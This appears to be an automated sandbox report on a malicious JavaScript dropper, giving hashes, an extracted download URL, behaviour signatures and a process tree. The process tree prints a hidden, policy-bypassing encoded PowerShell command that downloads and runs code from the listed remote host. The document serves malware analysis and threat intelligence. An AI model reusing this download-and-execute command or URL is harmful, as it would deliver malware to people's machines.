Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28-12-2023 21:51
Static task
static1
Behavioral task
behavioral1
Sample
faab3e5f78adeee0a978251e6abe4651.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
faab3e5f78adeee0a978251e6abe4651.js
Resource
win10v2004-20231215-en
General
-
Target
faab3e5f78adeee0a978251e6abe4651.js
-
Size
82KB
-
MD5
faab3e5f78adeee0a978251e6abe4651
-
SHA1
f80909ac65e84518a1efed219f4b81f39e618217
-
SHA256
1612f0161c79816e64580161b8a1006663f68a3d9403bfa9b8270498fe209712
-
SHA512
6d63b29ed4fc857fee7774ea666d09364c8d1adba17b6cc0a1e407a31f4d110afe0ffbda83396ffc368d592b40adb238219e910a33c013be163ea1d50e994fcb
-
SSDEEP
1536:rNGcdRQHbkYWnc9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8R:rNGHHbpWc9Ry98guHVBqqg2bcruzUHm2
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2812 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2532 wrote to memory of 2128 2532 wscript.exe 28 PID 2532 wrote to memory of 2128 2532 wscript.exe 28 PID 2532 wrote to memory of 2128 2532 wscript.exe 28 PID 2128 wrote to memory of 2812 2128 cmd.exe 30 PID 2128 wrote to memory of 2812 2128 cmd.exe 30 PID 2128 wrote to memory of 2812 2128 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\faab3e5f78adeee0a978251e6abe4651.js1⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-